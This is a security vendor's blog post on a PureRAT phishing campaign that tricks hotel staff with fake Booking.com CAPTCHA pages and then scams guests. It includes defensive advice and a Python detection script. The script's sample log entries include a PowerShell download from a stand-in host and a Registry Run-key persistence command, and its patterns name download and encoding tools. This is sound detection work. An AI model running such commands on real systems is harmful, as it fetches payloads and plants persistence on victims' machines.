PureRAT Malware Campaign Exploits Hotels to Steal Guest Banking Details

A widespread phishing campaign is targeting hotels worldwide, using fake Booking.com pages to trick staff into installing PureRAT malware. Once inside, attackers steal booking platform credentials and use real reservation details to scam guests out of their banking information.

The campaign has been active since at least April 2025 and was still operational as of early October 2025. The attack turns compromised hotels into unwitting accomplices in fraud against their own customers.

How the Attack Works

The campaign uses a social engineering technique called ClickFix, which tricks users into running malicious commands by displaying fake error messages or CAPTCHA checks. Attacks begin with malicious emails sent to hotels that resemble legitimate customer requests through Booking.com. Some emails appear to come from other compromised hotel accounts, while others have forged headers to spoof Booking.com directly.

When hotel staff click links in these emails, they land on fake Booking.com pages displaying what appears to be a security verification. The page shows a fake CAPTCHA or error message with instructions telling users to:

  1. Press Windows + R to open the Run dialog
  2. Paste a command that’s automatically copied to their clipboard
  3. Hit Enter to resolve the issue

Instead of fixing anything, the malicious PowerShell command gathers system information, downloads a ZIP archive, and loads PureRAT malware through DLL side-loading.

From Hotels to Guests

Getting malware on hotel computers is just phase one. Attackers use stolen credentials to access booking platforms like Booking.com and Expedia, then leverage real reservation details to target hotel customers.

Guests receive messages via email or WhatsApp containing accurate information about their reservations. The messages claim there’s a security issue requiring them to verify their banking details to prevent their booking from being canceled. Links take victims to fake Booking.com or Expedia pages designed to harvest credit card information.

Because the messages contain legitimate reservation details and appear to come from the hotel’s actual Booking.com account, guests have little reason to doubt their authenticity.

PureRAT Capabilities

PureRAT is a modular remote access trojan with extensive capabilities, including remote desktop control, webcam and microphone access, keylogging, file management, cryptocurrency wallet hijacking, and the ability to launch DDoS attacks. It’s protected by .NET Reactor to make analysis harder and establishes persistence by creating Windows registry entries.

Once installed, PureRAT gives attackers everything they need to monitor systems, steal credentials, and maintain long-term access to networks.

Increasing Sophistication of Cyberattacks

The campaign reflects a professionalization of fraud targeting the hospitality industry, with cybercriminals adopting an “as-a-service” model that lowers entry barriers and maximizes profits.

Researchers observed Telegram bots selling Booking.com logs, and a threat actor named “moderator_booking” advertising services to purchase logs from Booking.com, Expedia, Airbnb, and Agoda. These services even include manual verification of stolen credentials within 24 to 48 hours.

Log checker tools are available for as low as $40 on cybercrime forums, making it cheap and easy for criminals to verify that stolen accounts still work. Some attackers are even hiring specialists called “traffers” specifically to handle malware distribution, further dividing labor and increasing efficiency.

Why ClickFix Works

ClickFix exploits users’ natural tendency to solve technical problems and their familiarity with CAPTCHA verification prompts. When someone sees an error message with clear instructions to fix it, their instinct is to follow those steps. This is especially true for busy hotel staff who need to maintain access to booking platforms to do their jobs.

The technique also bypasses many traditional security controls because the victim runs the malicious code themselves. Email filters might catch malicious attachments, but they can’t stop users from manually copying and pasting commands into their own terminals.

Recent variations of ClickFix have gotten more sophisticated. Pages can now adapt to display instructions matching the victim’s operating system, automatically copy malicious code to the clipboard, and even include embedded videos and countdown timers to increase credibility.

What Hotels Can Do

This attack relies entirely on social engineering, which means the right training and procedures can stop it.

Train staff to recognize ClickFix attacks. Anyone asking you to manually run code or paste commands into Windows Run, PowerShell, or Terminal is trying to compromise your system. Legitimate services don’t ask users to run PowerShell commands, even if the page looks exactly like Booking.com.

Monitor and restrict PowerShell execution. Organizations can detect ClickFix attacks by monitoring for PowerShell downloads from URLs, suspicious script execution, and the creation of registry Run keys via PowerShell. Consider restricting PowerShell access to IT staff only, or implementing application whitelisting to block unauthorized scripts.
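As an added illustration (not code from the original post or from Admin By Request), a small Python triage script that applies the detection ideas above to constructed PowerShell script block log text in the shape of Event ID 4104 entries. The host names, rule names and sample commands are invented for the example; it assumes events arrive as (host, script text) pairs exported from your logging pipeline.

```python
import re

# Constructed sample entries shaped like PowerShell script block log text
# (Event ID 4104): (host, script text). Invented, not real campaign telemetry.
SAMPLE_EVENTS = [
    ("frontdesk-01", "Get-ChildItem C:\\Reports | Sort-Object Length"),
    ("frontdesk-02", "Invoke-WebRequest -Uri http://verify.example.invalid/check.zip "
                     "-OutFile $env:TEMP\\c.zip; Expand-Archive $env:TEMP\\c.zip $env:TEMP\\c"),
    ("frontdesk-02", "Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
                     "-Name Updater -Value C:\\Users\\Public\\c\\host.exe"),
    ("it-admin-01", "Install-Module -Name PSReadLine -Scope CurrentUser"),
]

# Each rule captures one signal the post recommends watching for; a single
# hit is noisy on its own, so triage() looks for the chain rather than any one rule.
RULES = [
    ("download_from_url",
     re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer|DownloadFile|DownloadString)\b.*https?://", re.I)),
    ("run_key_persistence", re.compile(r"\\CurrentVersion\\Run\b", re.I)),
    ("hidden_or_encoded",
     re.compile(r"-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)),
    ("archive_expand", re.compile(r"\bExpand-Archive\b", re.I)),
]

# A download plus a Run-key write from the same host is the ClickFix/PureRAT
# shape described above (fetch an archive, then persist via the registry).
CHAIN = {"download_from_url", "run_key_persistence"}


def classify(script_text):
    """Return the names of all rules that match one script block."""
    return [name for name, rx in RULES if rx.search(script_text)]


def triage(events):
    """Group rule hits per host and return only hosts showing the full chain."""
    hits = {}
    for host, text in events:
        hits.setdefault(host, set()).update(classify(text))
    return {host: sorted(names) for host, names in hits.items() if CHAIN <= names}


if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(names)}")
```

The benign admin activity on it-admin-01 and the routine file listing on frontdesk-01 produce no alert, which is the point of requiring the chain rather than alerting on any single PowerShell download.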

Verify requests through separate channels. If you receive an urgent message about booking platform issues, don’t click the link. Instead, go directly to Booking.com through your browser or contact their support team through verified channels.

Use strong email filtering. While email filters can’t stop users from manually executing commands, they can block many of the initial phishing emails before they reach staff inboxes.

Implement network segmentation. Limit what compromised workstations can access. If a front desk computer gets infected, it shouldn’t have access to your entire network or sensitive financial systems.

Hotels need to warn their customers about these scams too. Send proactive communications explaining that:

  • You’ll never ask customers to verify banking details through email or WhatsApp links
  • Booking.com won’t ask for credit card details outside their official platform
  • Any messages claiming bookings will be canceled unless customers “verify” their payment information are scams

Consider adding these warnings to booking confirmation emails, check-in procedures, and hotel room materials.

Why This Keeps Working

The hospitality industry has become a high-value target because hotels sit at the intersection of customer data, financial information, and often understaffed IT departments. Attackers know this and they’re building entire ecosystems of services to exploit it.

This campaign highlights the reality that people remain the weakest link in cybersecurity. Technical controls matter, but they can’t stop an authorized user from running malicious code when a fake error message convinces them it’s necessary.

Training helps, but people make mistakes. When they do, privilege management limits the damage. Admin By Request EPM restricts which processes can run with elevated privileges, preventing malware from establishing persistence or spreading across your network.

Want to see what EPM can do? Book a demo or try our free plan for up to 25 endpoints.

About the Author:

Pocholo Legaspi

Pocholo Legaspi is a seasoned content marketer and SEO specialist with over nine years of experience crafting digital content that drives engagement and growth. With a background in tech and a Master’s in Business Informatics, he brings a data-driven approach to content strategy and storytelling.
